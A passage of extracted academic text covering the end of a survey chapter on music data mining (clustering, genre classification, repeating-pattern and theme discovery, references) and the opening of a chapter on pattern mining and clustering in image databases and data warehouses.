gain. Finally, Cilibrasi et al. (2003) propose a clustering scheme based on musical feature compression. The features utilised in Cilibrasi, de Wolf, and Vitanyi (2003) are note-on, note-off, average volume and modal note extracted from MIDI files. The average volume result stems from the average value of note velocity in each track, while modal note refers to the most often occurring pitch in each track. The similarity measure used (Li, Badger, Chen, Kwong, Kearney, & Zhang, 2001; Li & Vitanyi, 2001/2002; Li, Chen, Li, Ma, & Vitanyi,
Mining in Music Databases
2003) is based on Kolmogorov’s complexity. In order to cluster the music data, the proposed method consists of computing a phylogeny tree based on the previously mentioned distance between any two music files. The sub-trees of the phylogeny tree constitute the clusters that are created based on closeness of objects stored therein.
CLASSIFICATION Similar to clustering, classification aims at the purpose of grouping similar documents together. The main difference between clustering and classification is that clustering is a fully automated process requiring no preparation steps or maintenance; classification, on the other hand, generally requires manual, before execution specification of categories and updating these categories as new documents which are added to the collection. Many different features can be used for music classification, e.g., reference features (title and composer), content-based acoustic features (tonality, pitch and beat), symbolic features extracted from the scores and text-based features extracted from the song lyrics. In this section we focus on content-based features and music genre classification. The latter concerns the classification of music from different sources with respect to genres in general, and styles in particular.
Classification with Content-Based Features In content-based classification, physical features, such as pitch, duration, loudness and time/spectral domain features as well as perceptual features, such as timbre, its salient components and music properties humans perceive in sound are provided to the classification process. The output of a common classification engine may include retrieved music data similar to one or more of the supplied features, based on previous training of the engine
on feature classes or by general similarity. Following are two cases of recent research on the area. The proposed system by Wold et al. (1996) utilises as features loudness, pitch, brightness, bandwidth and harmonicity. Initially, n features are extracted from the music file producing an n-dimensional vector. The training of the system can either be done by directly defining constraints to the values of the feature vector, i.e., a specific value for pitch, or by supplying feature vectors and assigning them to a specific class manually. For each manually defined set of class, the proposed methodology calculates the mean vector and covariance matrix. Should a new audio file need be classified, its feature vector is calculated; while using the Euclidean distance, it is compared to the class’s threshold in order to ensure the degree of similarity. In case of mutually exclusive classes, the newly inserted file is inserted to the class with which its distance is the smallest. In order to define the quality measure of the class, the magnitude of the covariance matrix can be used. An alternative approach by Li (2000) is based on a classification method called the nearest feature line (NFL). The NFL utilises information provided by multiple prototypes per class explored, in contrast to the nearest neighbour (NN) classification in which the prototype is compared to each query individually. As far as the features used to represent the musical data, Li considers perceptual, cepstral as well as their combinations as features. The NFL’s key steps are interpolation or extrapolation of each pair of prototypes belonging to the same class by a linear model and, subsequently, generalisation of the prototypes by the feature line passing through the two points. The feature line’s role is to provide information about variants of the two sounds. Thus, the prototype’s set capacity is expanded. The classification is achieved using the minimum distance between the query’s feature point and feature lines.
51
Mining in Music Databases
Musical Genre Classification
PATTERN DISCOVERY
Music can be divided into genres in many different ways, while a genre may contain myriad different styles. These classifications are often arbitrary and controversial, and, furthermore, closely related styles often overlap. Herein we present issues related to genres with respect to classification. In order to categorically describe music, one can use musical genres. Their ability in structuring vast amounts of music available in digital form is rather popular on the Web as well as on non-online collections, thus become important for MIR. As previously mentioned, the process of genre categorisation in music can be divided into two steps: feature extraction and multi-class classification. During feature extraction, the system develops a representation of the music data to be classified that it will base on in order to perform the subsequent classification. The extracted features need to be musically coherent, compact in terms of size and effective in order to facilitate the classification. Research reported on music genre classification is rather limited. Li et al. (2003) proposed the use of DWCHs as features (based on wavelet histograms) to represent music and classified them using the one-versus-the-other method. Tzanetakis and Cook (2001) proposed a comprehensive set of features for direct modelling of music signals and used them for musical genre classification using k-nearest neighbours and Gaussian mixture models. In work by Deshpande et al. (2001), Gaussian mixtures, support vector machines and nearest neighbours are used to classify, based on timbral features, music into rock, piano and jazz. Finally, Soltau et al. (1998) proposed a music classification system using a set of abstract features utilising temporal structures, as well as their classification based on artificial neural networks.
The discovery of a repeated structure in music data is a pivotal step in music analysis. Such structures play a crucial role in the understanding of the construction of a musical piece in terms of musical motifs and themes. A theme (especially in classical music) is a melody that the composer uses as a starting point for development, which may be repeated in the form of variations. Repeating patterns have been considered as characteristic signatures of music objects, which have the notion of a quantitative measure for music similarity (Crawford, Iliopoulos, & Raman, 1998).
52
Algorithms for Repeating Patterns Discovery A motif is a minimum pattern that is meaningfully independent and complete within a piece of music. The variation extent within and the repetition frequency of a theme can differ depending on the composer and the type of music. Recent research has focused on searching motifs using methods that find repeating patterns in symbolic representations of music data (where the pitch information is selected as the main music feature). Given a music object S, a repeating pattern P is a subsequence of consecutive elements of S that appears at least twice in S (Hsu, Liu & Chen, 2001). The mining of repeating patterns is described in Hsu et al. (2001), where two algorithms are proposed for the discovery of non-trivial repeating patterns and feature melody string. The first algorithm uses a correlative matrix for the extraction of repeating patterns (Hsu et al., 1998), while the second is based on a repeating string-join operation. Experimental results in Hsu et al. (2001) indicate the superiority of the latter algorithm towards the correlative matrix approach. Koh and Yu (2001) presented a means of mining the maximum repeating patterns from the melody of a music object using a bit index sequence as well as an extension for extraction of frequent note
Mining in Music Databases
sequences from a set of music objects. Rolland et al. (2002) described an algorithm for the mining of sequential patterns in music data, which considers several peculiarities of music objects. Nevertheless, the number of repeating patterns may be very large, a fact that burdens their examination by human analysts. Existing research has identified that among the collection of repeating patterns, the longest ones are those that can be characterised as feature melody strings and are typically those that can yield to themes. Karydis et al. (2005) proposed an efficient algorithm for finding the longest repeating patterns, which discovers them by using a fast ascending searching procedure, as far as the length of the patterns is concerned, so as to quickly reach the required patterns. Thus, this algorithm avoids the examination of a large number of intermediate patterns and only considers those patterns that are necessary in order to reach the maximumlength patterns.
Algorithms for Music Theme Discovery Having argued in the previous section the efficiency and semantic quality of the repeating patterns as far as content-based music data retrieval is concerned, their use in indexing music sequences for the purposes of MIR (Hsu et al., 2001) comes as no surprise. Most importantly though, they provide a reference point for the discovery of music themes (Liu, Hsu, & Chen, A. L. P., 1999; Smith & Medina, 2001). Themes, being the musical phrases most likely to be remembered by listeners, make a theme-index focus the search on the parts of the database most apt to match a query. Although, a theme should be identified by the previous section, the difficulty that arises is how to distinguish the theme of all repeating patterns discovered. To address this issue a number of theme-discovering algorithms that have been proposed and are subsequently presented.
Thus, as far as the use of repeating patterns in theme discovery is concerned, Smith and Medina (2001) proposed a pattern matching technique leading to theme discovery that is based on a collection of previously found longest repeating patterns. Meek and Birmingham (2001) identify numerous features that need to be extracted from each music object for the discovery of themes. Among them, they considered as most important the position of the theme (favouring the themes appearing earlier in the music object). As described, such features can be used for the discovery of themes from the repeating patterns found. In addition, an interesting web-based system for theme discovery is presented in Kornstadt (1998). Patterns may not only be in one voice (the case of polyphonic music), but as a pattern may be distributed across several simultaneously sounding voices. Iliopoulos and Kurokawa ( 2002) and Iliopoulos, Niyad, Lenstrom, and Pinzon (2002) present a number of different algorithms for the discovery of such patterns, including distributed pattern matching with at most, k-differences (motif evolution).
SUMMARY AND PERSPECTIVES We have presented the most significant trends in recent research in the field of music mining. Similarity searching has attracted a lot of attention because it is related to CBMIR, the most prominent application of music mining. Due to peculiarities of music data, we paid special attention to issues regarding the perception of music. Next, we examined how well-known functionalities like clustering, classification and detection of repeating patterns have been applied in music mining. As described, music mining presents unique challenges; thus, the developed methods are quite dissimilar to existing ones from other mining fields. The prospects of music mining, both in terms of research and applications, seem to be
53
Mining in Music Databases
encouraging. Since it is relatively new a research field, it contains several open research issues. To name some important ones: methods for detecting meaningful music units, scalable algorithms (which will also consider disk resident music data) and tools for visualisation and audition (which are not required in other mining fields) of the extracted patterns. Music mining can and should expand to new application areas as well. To name some few: (a)
(b)
(c)
Tracing of plagiarism and copyright protection, by using clever similarity searching that will disclose hidden reproduction of original music. E-commerce of music. Attempts like iTune or iMusic may change the paradigm of how music is merchandised. We can envisage environments in which users can interactively search for individual music pieces and create their own compilations. For this task, a user can be assisted by music mining, which will help in finding the desired pieces and others pieces as well, which may be previously unknown to the user and different in terms of genre and style. The relation with industrial standards. MPEG-7 is an example of an emerging standard, which tries to define a description of audio-based musical content. This can have an impact on the hardware industry as well, since manufacturers of recording devices (video cameras and DVD recorders) may want to include the functionality of automatic indexing of recorded music content (Leman, 2002). For all the above reasons, we believe that music mining will grow significantly in the forthcoming years.
REFERENCES Abiteboul, S. (1997). Querying semi-structured data. In Proceedings of Conference on Database Theory (pp. 1-18). 54
AKoff. (2001). AKoff sound labs, AKoff Music Composer. Retrieved from http://www.akoff. com/ Amir, A., & Farach, M. (1995). Efficient 2-dimensional approximate matching of half-rectangular figures. Information and Computation, 118, 1-11. AMNS. (2000). Nightingale. Retrieved from http://www.ngale.com Arakisoftware. (2003). Arakisoftware AmazingMIDI. Retrievable from http://www.pluto.dti. ne.jp/ ~araki/amazingmidi/ Bainbridge, D. (1998). MELDEX: A web-based melodic index service. In Melodic similarity: concepts, procedures, and applications, Computing in Musicology, 11, ch. 12, 223-230. Bello, J. P. (2003). Towards the automated analysis of simple polyphonic music: A knowledge-based approach. Unpublished doctoral dissertation, Univ. of London. Bent, I. (1980). Analysis. Grove’s Dictionary of Music. London: Macmillan. Bigand, E., Madurell, F., Tillmann, B., & Pineau, M. (1999). Effect of global structure and temporal organization on chord processing. Journal of Experimental Psychology: Human Perception and Performance, 25, 184-197. Byrd, D., & Crawford, T. (2002). Problems of music information retrieval in the real world. Information Processing and Management, 38(2), 249-272. Byrd, D. (2001). Music-notation searching and digital libraries. In Proceedings of ACM/ IEEE - CS Joint Conference on Digital Libraries (pp. 239-246). Cambouropoulos, E., & Widmer, G. (2000). Automatic motivic analysis via melodic clustering. Journal of New Music Research, 29(4), 303-317.
Mining in Music Databases
Cambouropoulos, E., Crochemore, M., Iliopoulos, C. S., Mouchard, L., & Pinzon Y. J. (1999). Algorithms for computing approximate repetitions in musical sequences. In Proceedings of Australasian Workshop on Combinatorial Algorithms (Vol. 3, pp. 114-128). Chai, W., & Vercoe, B. (2003). Structural analysis of musical signals for indexing and thumbnailing. In Proceedings of ACM/IEEE-CS Joint Conference on Digital Libraries (pp. 27-34). Chen, J. C. C., & Chen, A. L. P. (1998). Query by rhythm: An approach for song retrieval in music databases. In Proceedings of Workshop Research Issues in Data Engineering (pp. 139-146). Cilibrasi, R., de Wolf, R., & Vitanyi, P. (2003). Algorithmic clustering of music. The Computing Research Repository. Clifford, R., & Iliopoulos, C. S. (2004). Approximate string matching for music analysis. Soft Computing. Cooper, M., & Foote, J. (2003). Summarizing popular music via structural similarity Analysis. In Proceedings of IEEE Workshop on Applications of Signal Processing to Audio and Acoustics. Crawford, T., Iliopoulos, C. S., & Raman, R. (1998). String matching techniques for musical similarity and melodic recognition. Computing in Musicology, 11, 73-100. Davy, M., & Godsill, S. (2003). Bayesian harmonic models for musical signal analysis. Valencia International meeting (Bayesian Statistics 7), Oxford University Press. Dervos, D., Linardis, P., & Manolopoulos, Y. (1997). S-index: A hybrid structure for text retrieval. In Proceedings of East-European Conference on Advances in Databases and Information Systems (pp. 204-209). Deshpande, H., Singh, R., & Nam, U. (2001). Classification of music signals in the visual domain.
In Proceedings of the COST-G6 Conference on Digital Audio Effects. Doraisamy, S., & Ruger, S. (2004). A polyphonic music retrieval system using N-Gram. In Proceedings of International Symposium in Music Information Retrieval. Eerola, T., Järvinen, T., Louhivuori, J., & Toiviainen, P. (2001). Statistical features and perceived similarity of folk melodies. Music Perception, 18, 275-296. Fayyad, U. M., Piatetsky-Shapiro, G., & Smyth, P. (1996). The KDD process for extracting useful knowledge from volumes of data. Communications of the ACM, 39(11), 27-34. Hoos, H. H., Hamel, K. A., Renz, K., & Kilian, J. (1998). The GUIDO music notation format - A novel approach for adequately representing score-level music. In Proceedings of International Computer Music Conference (pp. 451-454). Hoos, H. H., Renz, K., & Gorg, M. (2001). GUIDO/MIR: An experimental musical information retrieval system based on GUIDO music notation. In Proceedings of International Symposium on Music Information Retrieval (pp. 41-50). Hsu, J., Liu, C., & Chen, A. L. P. (1998). Efficient repeating pattern finding in music databases. In Proceedings of International Conference on Information and Knowledge Management (pp. 281-288). Hsu, J., Liu, C., & Chen, A. L. P. (2001). Discovering non-trivial repeating patterns in music data. IEEE Transactions on Multimedia, 3(3), 311-325. Hubbard, T. L. (1996). Synesthesia-like mappings of lightness, pitch, and melodic interval. American Journal of Psychology, 109, 219-238. Iliopoulos, C. S., & Kurokawa, M. (2002). Exact & approximate distributed matching for musical melodic recognition. In Proceedings of Conven-
55
Mining in Music Databases
tion on Artificial Intelligence and the Simulation of Behaviour (pp. 49-56). Iliopoulos, C. S., Lemstrom, K., Niyad, M., & Pinzon, Y. J. (2002). Evolution of musical motifs in polyphonic passages. In Proceedings of Symposium on AI and Creativity in Arts and Science (pp. 67-76). Iliopoulos, C. S., Niyad, M., Lenstrom, K., & Pinzon, Y. J. (2002). Evolution of musical motifs in polyphonic passages. In Proceedings of Convention on Artificial Intelligence and the Simulation of Behaviour (pp. 67-75). Innovative (2004). Innovative music systems intelliScore. Retrievable from http://www.intelliscore.net/ ISO/IEC. (2003). MPEG-7 overview (version 9). Retrievable from http://www.chiariglione.org/ mpeg/standards/ mpeg-7/mpeg-7.htm Kalogeraki, V., Gunopulos, D., & ZeinalipourYazti, D. (2002). A local search mechanism for peer-to-peer networks. In Proceedings of Conference on Information and Knowledge Management (pp. 300-307). Karydis, I., Nanopoulos, A., & Manolopoulos, Y. (2005). Mining maximum-length repeating patterns in music databases. Multimedia Tools & Applications. Manuscript submitted for publication. Karydis, I., Nanopoulos, A., Papadopoulos, A., & Manolopoulos, Y. (2005). Audio indexing for efficient music information retrieval. In Proceedings of International Multimedia Modelling Conference (pp. 22-29). Karydis, I., Nanopoulos, A., Papadopoulos, A., & Manolopoulos, Y. (2005). Evaluation of similarity searching methods for music data in peer-to-peer networks. International Journal of Business Intelligence and Data Mining. Manuscript submitted for publication.
56
Lin, K., Jagadish, H., & Faloutsos, C. (1994). The TV-Tree: An index structure for high-dimensional data. The VLDB Journal, 3(4), 517-542. Klapuri, A. (2004). Signal processing methods for the automatic transcription of music. Unpublished doctoral dissertation. Tampere University of Technology, Finland. Koh, J. L., & Yu, W. D. C. (2001). Efficient feature mining in music objects. In Proceedings of Database and Expert Systems Applications (pp. 221-231). Kornstadt, A. (1998). Themefinder: A web-based melodic search tool. Computing in Musicology, 11, 231-236. Kostek, B., & Wieczorkowska, A. (1997). Parametric representation of musical sounds. Archive of Acoustics, 3-26. Lambropoulos, A. S., & Tsihrintzis, G. A. (2004). Agglomerative hierarchical clustering for musical database visualization and browsing. In Proceedings of Hellenic Conference on Artificial Intelligence (pp. 177-186). Lamont, A., & Dibben, N. (2001). Motivic structure and the perception of similarity. Music Perception, 18, 245-274. Lee, W., & Chen, A. L. P. (2000). Efficient multifeature index structures for music information retrieval. In Proceedings of Annual International Symposium Electronic Imaging 2000 Science & Technology (pp. 177-188). Leman, M. (2002). Musical audio mining. Dealing with the data flood: Mining data, text and multimedia. Rotterdam: STT Netherlands Study Centre for Technology Trends. Li, M., Badger, J. H., Chen, X., Kwong, S., Kearney, P., & Zhang, H. (2001). An information-based sequence distance and its application to whole mitochondrial genome phylogeny. Bioinformatics, 17(2), 149-154.
Mining in Music Databases
Li, M., Chen, X., Li, X., Ma, B. & Vitanyi, P. (2003). The similarity metric. In Proceedings of ACM-SIAM Symposium on Discrete Algorithms (pp. 863-872). Li, M., & Vitanyi, P. M. B. (2002). Algorithmic complexity. International Encyclopedia of the Social & Behavioural Sciences (pp. 376-382). Li, S. Z. (2000). Content-based classification and retrieval of audio using the nearest feature line method. IEEE Transactions on Speech and Audio Processing, 8(5), 619-625. Li, T., Ogihara, M, & Li, Q. (2003). A comparative study on content-based music genre classification. In Proceedings of Conference on Research and Development in Information Retrieval (pp. 282-289). Li, X., & Wu, J. (2004). Searching techniques in peer-to-peer networks. In Handbook of theoretical and algorithmic aspects of ad hoc, sensor, and peer-to-peer networks. Boca Raton, Florida: CRC Press. Lippincott, A. (2002). Issues in content-based music information retrieval. Journal of Information Science, 137-142. Liu, C. C., Hsu, J. L., & Chen, A. L. P. (1999). An approximate string matching algorithm for content-based music data retrieval. In Proceedings of IEEE Multimedia Computing and Systems (pp. 451-456). Liu, C. C., Hsu, J. L., & Chen, A. L. P. (1999). Efficient theme and non-trivial repeating pattern discovering in music databases. In Proceedings of IEEE International Conference on Data Engineering (pp. 14-21). Liu, N.-H., Wu, Y.-H., & Chen, A. L. P. (2003). Efficient K-NN search in polyphonic music databases using a lower bounding mechanism. In Proceedings of International Workshop on Multimedia Information Retrieval (pp. 163-170).
Lo, Y. L., & Chen, S. J. (2003). The multi-featured indexing for music data. Journal of Chaoyang University of Technology, 1, 355-374. Maidín, D. Ó. (1998). A geometrical difference algorithm. Computing in Musicology, 11, 65-72. Maidín, D. Ó, & Cahill, M. (2001). Score processing for MIR. In Proceedings of International Symposium on Music Information Retrieval. McAdams, S., Vieillard, S., Houix, O., & Reynolds, R. (2004). Perception of musical similarity among contemporary thematic materials in two instrumentations. Music Perception, 22, 207237. Meek, C., & Birmingham, W. P. (2001). Thematic extractor. In Proceedings of International Symposium on Music Information Retrieval (pp. 119-128). Meredith, D. (2003). Musical grouping structure. Lectures on Music Perception and Cognition, Part II Module BMus/BSc in Music Department of Music, City University, London. Mitra, S., Pal, S., & Mitra, P. (2004). Data mining is soft computing framework: A survey. IEEE Transactions on Neural Networks, 13(1), 3-14. Owen, S.R. (2000). On the similarity of MIDI documents. Harvard University. Papaodysseus, C., Roussopoulos, G., Fragoulis, D., Panagopoulos, Th., & Alexiou, C. (2001). A new approach to the automatic recognition of musical recordings. Journal of Acoustical Engineering Society, 49(1/2), 23-35. Paraskevas, M., & Mourjopoulos, J. (1996). A statistical study of the variability and features of audio signals. Audio Engineering Society. Pfeiffer, S., Fischer, S., & Effelsberg, W. (1996). Automatic audio content analysis. In Proceedings of ACM International Conference on Multimedia (pp. 21-30).
57
Mining in Music Databases
Pickens, J. (2001). A survey of feature selection techniques for music information retrieval. Technical report, Center for Intelligent Information Retrieval, Department of Computer Science, University of Massachussetts. Pickens, J. (2004). Harmonic modeling for polyphonic music retrieval. Unpublished doctoral dissertation. University of Massachusetts at Amherst. Pickens, J., Bello, J. P., Monti, G., Crawford, T., Dovey, M., Sandler, M., & Byrd, D. (2003). Polyphonic score retrieval using polyphonic audio queries: A harmonic modeling approach. Journal of New Music Research, 32(2), 223-236. Pienimäki, A., & Lemström, K. (2004). Clustering symbolic music using paradigmatic and surface level analyses. In Proceedings of International Conference on Music Information Retrieval (pp. 262-265). Pikrakis, A., Theodoridis, S., & Kamarotos, D. (2002). Recognition of isolated musical patterns using hidden markov models. In Proceedings of International Conference on Music and Artificial Intelligence (pp. 133-143). Pickens, J. (2001). A survey of feature selection techniques for music information retrieval. In Proceedings of International Symposium on Music Information Retrieval. Reiss, J., Aucouturier, J.-J., & Sandler, M. (2001). Efficient multidimensional searching routines for music information retrieval. In Proceedings of International Conference on Music Information Retrieval (pp. 163-171). Roads, C. (1996). The computer music tutorial. MIT Press. Rolland, P.-R., & Ganascia, J.-G. (2002). Pattern detection and discovery: The case of music data mining. In Proceedings of ESF Exploratory Workshop on Pattern Detection and Discovery (pp. 190-198).
58
Schellenburg, E. G., Krysciak, A. M., & Campbell, R. J. (2001). Perceiving emotion in melody: Interactive effects of pitch and rhythm. Music Perception, 18, 155-171. Seventh (2004). Seventh String Software, Transcribe! Retrievable from http://www.seventhstring. demon.co.uk/ Shepard, R. (1999). Music, cognition, and computerized sound: An introduction to psychoacoustics. Cambridge, MA: MIT Press. Shifrin, J., Pardo, B., Meek, C., & Birmingham, W. (2002). HMM-based musical query retrieval. In Proceedings of ACM/IEEE-CS Conference on Digital libraries (pp. 295-300). Smith, L., & Medina, R. (2001). Discovering themes by exact pattern patching. In Proceedings of International Symposium on Music Information Retrieval (pp. 31-32). Soltau, H., Schultz, T., & Westphal, M. (1998). Recognition of music types. In Proceedings of the IEEE International Conference on Acoustics, Speech and Signal Processing. Subrahmanian, V. S. (1998). Multimedia database systems. San Francisco: Morgan Kaufmann Publishers. Szeto, W. M., & Wong, M. H. (2003). A stream segregation algorithm for polyphonic music databases. In Proceedings of International Database Engineering and Applications Symposium (pp. 130-138). Temperley, D. (2001). The cognition of basic musical structures. MIT Press. Tzanetakis, G., Essl, G., & Cook, P. (2001). Automatic musical genre classification of audio signals. In Proceedings of International Symposium on Music Information Retrieval. Velivelli, A., Zhai, C., & Huang, T. S. (2003). Audio segment retrieval using a synthesized HMM. In Proceedings of ACM SIGIR Workshop on Multimedia Information Retrieval.
Mining in Music Databases
White, R. E. (2004). Recognition and perception of whole-tone, natural minor, harmonic minor, and melodic minor scales. In Proceedings of Southwestern Psychological Association.
ENDNOTES 1
Wieczorkowska, A. (2001). Musical sound classification based on wavelet analysis. Fundamenta Informaticae, 47(1/2), 175-188. Wieczorkowska, A., & Ras, Z. (2001). Audio content description in sound databases. Web Intelligence: Research and Development (pp. 175-183). Wold, E., Blum, T., Keislar, D., & Wheaton, J. (1996). Content-based classification, search and retrieval of audio. IEEE Trans. Multimedia, 3(3), 27-36. Won, J.-Y., Lee, J.-H., Ku, K., Park, J., & Kim, Y.-S. (2004). A content-based music retrieval system using representative melody index from music databases. In Proceedings of East-European Conference on Advances in Databases and Information Systems. Yang, B., & Garcial-Molina, H. (2002). Improving search in peer-to-peer networks. In Proceedings of International Conference of Distributed Computer Systems, 5-15. Yang, C. (2002). Efficient acoustic index for music retrieval with various degrees of similarity. In Proceedings of ACM Multimedia Conference, 584-591.
2
3
4
5
6
7
8
9
Rolland & Ganascia (2002) makes an interesting distinction between pattern discovery and pattern extraction. The former refers to the detection of local regularities in data. The latter also refers to such kind of detection, but is additionally concerned with the explicit availability of the patterns in some language, at the end of the mining process. To name just few: music sold as CDs, concerts, broadcasting of video-clips in mass media, advertised products related to music and music performers and, more recently, online sales of music in electronic format. Notice that when mining from relational or other highly structured data, this problem is not present at all, since units of information are well defined by the schema of the database. See: “The Complete Detailed MIDI 1.0 Specification,” MIDI Manufactures Association, 1996. This list is by no means exhaustive. It merely presents a few of the latest systems. For a broader analysis readers are referred to Roads (1996). For a broader analysis readers are referred to Roads (1996). Acoustical pertains to the objective physics of a sound. For example, frequency is a physical or acoustical property, whereas pitch is a subjective or auditory property. Music information exchanged in P2P networks is customarily in acoustic format.
This work was previously published in Processing and Managing Complex Data for Decision Support Systems, edited by J. Darmont and O. Boussaid, pp. 340-374, copyright 2006 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
59
60
Chapter 1.5
Pattern Mining and Clustering on Image Databases Marinette Bouet LIMOS, Blaise Pascal University-Clermont-Ferrand, France Pierre Gançarski LSIIT-AFD-Louis Pasteur University, France Marie-Aude Aufaure Supélec—INRIA, France Omar Boussaïd University LUMIERE Lyon, France
ABSTRACT Analysing and mining image data to derive potentially useful information is a very challenging task. Image mining concerns the extraction of implicit knowledge, image data relationships, associations between image data and other data or patterns not explicitly stored in the images. Another crucial task is to organise the large image volumes to extract relevant information. In fact, decision support systems are evolving to store and analyse these complex data. This chapter presents a survey of the relevant research related to image data processing. We present data warehouse advances that organise large volumes of data linked
with images, and then we focus on two techniques largely used in image mining. We present clustering methods applied to image analysis, and we introduce the new research direction concerning pattern mining from large collections of images. While considerable advances have been made in image clustering, there is little research dealing with image frequent pattern mining. We will try to understand why.
INTRODUCTION In recent years, most organisations have been dealing with multimedia data integrating differ-
ent formats such as images, audio formats, video formats, texts, graphics, or XML documents. For example, a lot of image data have been produced for various professional or domestic domains such as weather forecasting, surveillance flights, satellites, bio-informatics, biomedical imaging, marketing, tourism, press, Web, and so forth. Such data have been at the disposal of all audiences. Faced with the amount of information produced in numerous domains, there has been a growing demand for tools allowing people to efficiently manage, organise, and retrieve multimedia data. In this chapter, we focus our attention on the media image. Images may be characterised in terms of three aspects—the volume of the data, the pixel matrix, and the high dimensionality of the data. The first aspect is linked to the huge volume of these data (from a few hundred bytes to several gigabytes for the remote sensing images); the second one reflects the intrinsic nature of the pixel matrix. A pixel or a pixel sequence itself does not mean anything: images do not directly contain any information. Yet the presence of one or more pixel sequences often points to the presence of relevant information. In fact, image interpretation and exploitation need extra relevant information including semantic concepts such as annotations or ontologies, cluster characterisation, and so forth. Today, image and, more generally, multimedia retrieval systems have reached their limits owing to this semantic information absence.
Moreover, in the image retrieval context, a logical indexation process is performed to associate a set of metadata (textual and visual features) with images. These image features are stored in numeric vectors. Their high dimensionality, the third image aspect, constitutes a well known problem. All these different points are, in fact, related to image complexity. Classical data mining techniques are largely used to analyse alphanumerical data. However, in an image context, databases are very large since
they contain strongly heterogeneous data, often not structured and possibly coming from different sources within different theoretical or applicative domains (pixel values, image descriptors, annotations, trainings, expert or interpreted knowledge, etc.). Besides, when objects are described by a large set of features, many of them are correlated, while others are noisy or irrelevant. Furthermore, analysing and mining these multimedia data to derive potentially useful information is not easy. For example, image mining involves the extraction of implicit knowledge, image data relationships, associations between image data, and other data or patterns not explicitly stored in the images. To circumvent this complexity, we can multiply the number of descriptors. The problem is now to define multidimensional indexes so that searching the nearest neighbours becomes more efficient using the index rather than a sequential search. In the image case, the high dimensionality due to complex descriptors is still an unsolved research problem. Moreover, another problem is to use external knowledge that could be represented using ontologies or metadata. Taking account of a priori knowledge, such as annotation and metadata to build an ontology dedicated to an application, is also a challenge and implies the definition of new descriptors that integrate semantics. As an example, the Web contains many images that are not exploited using the textual part of the Web pages. In this case, the combination of visual and textual information is particularly relevant. Finally, a crucial task is to organise these large volumes of “raw” data (image, text, etc.) in order to extract relevant information. In fact, decision support systems (DSS) such as data warehousing, data mining, or online analytical processing (OLAP) are evolving to store and analyse these complex data. OLAP and data mining can be seen as two complementary fields. OLAP can easily deal with structuring data before their analysis and with organising structured views. However, this technique is restricted to a simple data navigation
61
Pattern Mining and Clustering on Image Databases
and exploration. Data warehouse techniques can help data preprocessing and offer a good structure for an efficient data mining process. Consequently, new tools must be developed to efficiently retrieve relevant information in specialised and generalised image databases. Different data mining techniques contributions have been or may be developed: reducing the retrieval space in the multidimensional indexation domain, learning by relevance feedback and without relevance feedback, and using the synergy between textual and visual features to better explore and exploit the image database. For instance, a usual way to address the problem of retrieval of relevant information is to perform an automatic classification of images, that is, to classify images into different categories so that each one is composed of images that have a similar content. A more recent approach consists in pattern mining such as rule mining: associations between image content features and non-image content features, associations of different image contents with no spatial relationships, and associations among image contents with spatial relationships. In this chapter, we present a survey of the relevant research related to image processing. We present data warehouse solutions to organise large volumes of data linked with images, and we focus on two techniques used in image mining. On one hand, we present clustering methods applied to image analysis, and on the other hand, we introduce the new research direction concerning pattern mining from large collections of images. Because there is a lack of hybrid data mining methods and methodologies which use the complementarity of these image or video data in a collaborative way, and which considers them from different points of view, we shall sketch a multistrategic data mining approach able to handle complex data. The rest of this chapter is organised as follows. The second section presents data warehouses, classification, and pattern mining techniques related to classical data. The third section pres-
62
ents some relevant work related to these three aspects applied to image mining. The fourth section describes some issues and applications linked with these approaches. The fifth section concludes our study.
DATA WAREHOUSE, PATTERN MINING, AND CLASSIFICATION IN CLASSICAL DATA PROCESSING This section presents data warehouses, classification, and pattern mining techniques related to classical data. Data warehouses techniques can be seen as a preprocessing stage used to strengthen data structuring. Data mining techniques, such as pattern mining (association rules or frequent pattern search), have been intensively used for many applications. This technique consists in generating rules from facts according to a threshold. Data clustering can be divided into partition, hierarchical, density-based, and conceptual clustering. Some methods are also based on neuronal methods such as self-organised maps. In most cases, the choice of a similarity measure is a crucial point.
Data Warehouses Data warehousing and OLAP technologies (Inmon, 2005; Kimball & Ross, 2002) are now considered well established. They aim, for instance, to analyse the behaviour of a customer, a product, or a company, and may help monitoring one or several activities (commercial or medical pursuits, patent deposits, etc.). In particular, they help analyse such activities in the form of numerical data. A data warehouse is a subject oriented, integrated, time-variant, and nonvolatile collection of data that supports managerial decision making (Inmon, 2005). Data warehousing has been cited as the highest-priority postmillennium project of more than half of information technology (IT) executives. A large number of data warehousing
Pattern Mining and Clustering on Image Databases
methodologies and tools are available to support the growing market. However, with so many methodologies to choose from, a major concern for many firms is which one to employ in a given data warehousing project. Online transactional processing (OLTP) systems are useful for addressing the operational data needs of a firm. However, they are not well suited for supporting decision-support queries or business questions that managers typically need to answer. Such queries are analytical and can be answered using roll up aggregation, drill down, and slicing/dicing of data, which are best supported by OLAP systems. Data warehouses support OLAP applications by storing and maintaining data in multidimensional format (Chaudhuri & Dayal, 1997; Kimball & Ross, 2002). Data in an OLAP warehouse are extracted and loaded from multiple OLTP data sources (including DB2, Oracle, IMS databases, and flat files) using Extract, Transform, and Load (ETL) tools. The warehouse is located in a presentation server. It can span enterprise-wide data needs or can be a collection of “conforming” data marts. Data marts (subsets of data warehouses) are conformed by following a standard set of attribute declarations called a data warehouse bus (Kimball & Ross, 2002). The data warehouse uses a metadata repository to integrate all of its components. The metadata store the definitions of the source data, the data models for target databases, and the transformation rules that convert source data into target data. The concepts of time variance and nonvolatility are essential for a data warehouse (Inmon, 2005). Inmon emphasised the importance of cross-functional slices of data drawn from multiple sources to support a diversity of needs (Inmon, 2005); the foundation of his subject-oriented design was an enterprise data model. Kimball and Ross (2002) introduced the notion of dimensional modeling, which addresses the gap between relational databases and data warehouses. In classical data warehouses, data volumetry now constitutes the main problem. To tackle the
performance problem, several solutions, such as materialised views and index selection or fragmentation, are proposed in the literature. Star schemas are probably the simplest and most used data warehouse models. A star schema is characterised by one or more very large fact tables that contain the primary information in the data warehouse, and a number of much smaller dimension tables (or lookup tables), each of which contains information about the entries for a particular attribute in the fact table (Chaudhuri & Dayal, 1997; Kimball & Ross, 2002). In a warehousing process, multidimensional modeling allows the creation of appropriated analysis contexts. The data warehousing and OLAP technologies are now well-suited to be applied in management applications, especially when data are numerical. However, in many domain applications, such as medical or geographical ones, data coming from heterogeneous sources may be represented in different formats (text, images, video, etc.) and/or diversely structured. They may also be differently expressed and periodically changed. These data are called complex data. This complexity may concern the syntactic or the semantic aspect of data and, sometimes, it also concerns data processing. In this chapter, we have chosen to address the particular problem of image data, which represent a typical example of complex data. In 